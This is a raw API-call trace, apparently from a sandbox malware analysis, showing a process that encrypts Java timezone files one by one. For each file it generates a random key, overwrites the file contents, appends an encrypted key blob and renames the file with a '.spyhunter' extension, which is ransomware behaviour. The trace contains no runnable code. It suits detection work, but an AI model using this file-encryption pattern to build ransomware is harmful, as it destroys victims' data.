0x0 [0169.394] GetProcessHeap () returned 0x2c0000 [0169.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.394] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e554*=0xd9, lpOverlapped=0x0) returned 1 [0169.395] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.395] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e554*=0xd9, lpOverlapped=0x0) returned 1 [0169.395] GetProcessHeap () returned 0x2c0000 [0169.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.395] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.395] WriteFile (in: hFile=0x9c, lpBuffer=0x248e594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x248e594*, lpNumberOfBytesWritten=0x248e554*=0x4, lpOverlapped=0x0) returned 1 [0169.395] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e554*=0x30, lpOverlapped=0x0) returned 1 [0169.395] CloseHandle (hObject=0x9c) returned 1 [0169.396] GetProcessHeap () returned 0x2c0000 [0169.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.396] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching.spyhunter") returned 66 [0169.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching.spyhunter")) returned 1 [0169.396] GetProcessHeap () returned 0x2c0000 [0169.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.396] GetProcessHeap () returned 0x2c0000 [0169.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.396] GetProcessHeap () returned 0x2c0000 [0169.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc8c0 | out: hHeap=0x2c0000) returned 1 [0169.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e590 | out: pbBuffer=0x248e590) returned 1 [0169.397] GetProcessHeap () returned 0x2c0000 [0169.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e588*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e588*=0x30) returned 1 [0169.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.398] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur") returned 61 [0169.398] StrStrW (lpFirst="Kuala_Lumpur", lpSrch=".txt") returned 0x0 [0169.398] GetProcessHeap () returned 0x2c0000 [0169.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.398] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e54c*=0x91, lpOverlapped=0x0) returned 1 [0169.398] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.399] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e54c*=0x91, lpOverlapped=0x0) returned 1 [0169.399] GetProcessHeap () returned 0x2c0000 [0169.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.399] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.399] WriteFile (in: hFile=0x9c, lpBuffer=0x248e58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x248e58c*, lpNumberOfBytesWritten=0x248e54c*=0x4, lpOverlapped=0x0) returned 1 [0169.399] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e54c*=0x30, lpOverlapped=0x0) returned 1 [0169.399] CloseHandle (hObject=0x9c) returned 1 [0169.399] GetProcessHeap () returned 0x2c0000 [0169.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.399] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur.spyhunter") returned 71 [0169.399] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuala_Lumpur.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuala_lumpur.spyhunter")) returned 1 [0169.400] GetProcessHeap () returned 0x2c0000 [0169.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.400] GetProcessHeap () returned 0x2c0000 [0169.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.400] GetProcessHeap () returned 0x2c0000 [0169.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebae58 | out: hHeap=0x2c0000) returned 1 [0169.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e590 | out: pbBuffer=0x248e590) returned 1 [0169.400] GetProcessHeap () returned 0x2c0000 [0169.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e588*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e588*=0x30) returned 1 [0169.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.401] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk") returned 60 [0169.401] StrStrW (lpFirst="Krasnoyarsk", lpSrch=".txt") returned 0x0 [0169.401] GetProcessHeap () returned 0x2c0000 [0169.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.401] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e54c*=0x245, lpOverlapped=0x0) returned 1 [0169.402] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.402] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e54c*=0x245, lpOverlapped=0x0) returned 1 [0169.402] GetProcessHeap () returned 0x2c0000 [0169.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.402] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.402] WriteFile (in: hFile=0x9c, lpBuffer=0x248e58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x248e58c*, lpNumberOfBytesWritten=0x248e54c*=0x4, lpOverlapped=0x0) returned 1 [0169.402] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e54c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e54c*=0x30, lpOverlapped=0x0) returned 1 [0169.402] CloseHandle (hObject=0x9c) returned 1 [0169.402] GetProcessHeap () returned 0x2c0000 [0169.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.402] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk.spyhunter") returned 70 [0169.402] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Krasnoyarsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\krasnoyarsk.spyhunter")) returned 1 [0169.403] GetProcessHeap () returned 0x2c0000 [0169.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.403] GetProcessHeap () returned 0x2c0000 [0169.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.403] GetProcessHeap () returned 0x2c0000 [0169.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebad90 | out: hHeap=0x2c0000) returned 1 [0169.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e588 | out: pbBuffer=0x248e588) returned 1 [0169.403] GetProcessHeap () returned 0x2c0000 [0169.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e580*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e580*=0x30) returned 1 [0169.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.404] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata") returned 56 [0169.404] StrStrW (lpFirst="Kolkata", lpSrch=".txt") returned 0x0 [0169.404] GetProcessHeap () returned 0x2c0000 [0169.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.404] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e544*=0x61, lpOverlapped=0x0) returned 1 [0169.405] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.405] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e544*=0x61, lpOverlapped=0x0) returned 1 [0169.405] GetProcessHeap () returned 0x2c0000 [0169.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.405] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.405] WriteFile (in: hFile=0x9c, lpBuffer=0x248e584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x248e584*, lpNumberOfBytesWritten=0x248e544*=0x4, lpOverlapped=0x0) returned 1 [0169.406] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e544*=0x30, lpOverlapped=0x0) returned 1 [0169.406] CloseHandle (hObject=0x9c) returned 1 [0169.406] GetProcessHeap () returned 0x2c0000 [0169.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.406] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata.spyhunter") returned 66 [0169.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kolkata.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kolkata.spyhunter")) returned 1 [0169.407] GetProcessHeap () returned 0x2c0000 [0169.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.407] GetProcessHeap () returned 0x2c0000 [0169.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.407] GetProcessHeap () returned 0x2c0000 [0169.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc800 | out: hHeap=0x2c0000) returned 1 [0169.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e588 | out: pbBuffer=0x248e588) returned 1 [0169.407] GetProcessHeap () returned 0x2c0000 [0169.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e580*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e580*=0x30) returned 1 [0169.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.408] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga") returned 57 [0169.408] StrStrW (lpFirst="Khandyga", lpSrch=".txt") returned 0x0 [0169.408] GetProcessHeap () returned 0x2c0000 [0169.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.408] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e544*=0x259, lpOverlapped=0x0) returned 1 [0169.409] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffda7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.409] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e544*=0x259, lpOverlapped=0x0) returned 1 [0169.409] GetProcessHeap () returned 0x2c0000 [0169.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.409] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.409] WriteFile (in: hFile=0x9c, lpBuffer=0x248e584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x248e584*, lpNumberOfBytesWritten=0x248e544*=0x4, lpOverlapped=0x0) returned 1 [0169.409] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e544, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e544*=0x30, lpOverlapped=0x0) returned 1 [0169.409] CloseHandle (hObject=0x9c) returned 1 [0169.409] GetProcessHeap () returned 0x2c0000 [0169.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.410] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga.spyhunter") returned 67 [0169.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga.spyhunter")) returned 1 [0169.411] GetProcessHeap () returned 0x2c0000 [0169.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.411] GetProcessHeap () returned 0x2c0000 [0169.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.411] GetProcessHeap () returned 0x2c0000 [0169.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc740 | out: hHeap=0x2c0000) returned 1 [0169.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e580 | out: pbBuffer=0x248e580) returned 1 [0169.411] GetProcessHeap () returned 0x2c0000 [0169.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e578*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e578*=0x30) returned 1 [0169.411] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.412] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu") returned 58 [0169.412] StrStrW (lpFirst="Kathmandu", lpSrch=".txt") returned 0x0 [0169.412] GetProcessHeap () returned 0x2c0000 [0169.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.412] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e53c*=0x4d, lpOverlapped=0x0) returned 1 [0169.413] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.413] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e53c*=0x4d, lpOverlapped=0x0) returned 1 [0169.422] GetProcessHeap () returned 0x2c0000 [0169.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.422] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.422] WriteFile (in: hFile=0x9c, lpBuffer=0x248e57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x248e57c*, lpNumberOfBytesWritten=0x248e53c*=0x4, lpOverlapped=0x0) returned 1 [0169.422] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e53c*=0x30, lpOverlapped=0x0) returned 1 [0169.423] CloseHandle (hObject=0x9c) returned 1 [0169.423] GetProcessHeap () returned 0x2c0000 [0169.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.423] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu.spyhunter") returned 68 [0169.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu.spyhunter")) returned 1 [0169.424] GetProcessHeap () returned 0x2c0000 [0169.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.424] GetProcessHeap () returned 0x2c0000 [0169.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.424] GetProcessHeap () returned 0x2c0000 [0169.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebc680 | out: hHeap=0x2c0000) returned 1 [0169.424] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e580 | out: pbBuffer=0x248e580) returned 1 [0169.424] GetProcessHeap () returned 0x2c0000 [0169.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.425] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e578*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e578*=0x30) returned 1 [0169.425] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kashgar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.426] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kashgar") returned 56 [0169.426] StrStrW (lpFirst="Kashgar", lpSrch=".txt") returned 0x0 [0169.426] GetProcessHeap () returned 0x2c0000 [0169.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.426] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e53c*=0xc1, lpOverlapped=0x0) returned 1 [0169.427] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.427] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xc1, lpNumberOfBytesWritten=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e53c*=0xc1, lpOverlapped=0x0) returned 1 [0169.427] GetProcessHeap () returned 0x2c0000 [0169.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.427] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.427] WriteFile (in: hFile=0x9c, lpBuffer=0x248e57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x248e57c*, lpNumberOfBytesWritten=0x248e53c*=0x4, lpOverlapped=0x0) returned 1 [0169.427] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e53c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e53c*=0x30, lpOverlapped=0x0) returned 1 [0169.427] CloseHandle (hObject=0x9c) returned 1 [0169.427] GetProcessHeap () returned 0x2c0000 [0169.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.427] wnsprintfW 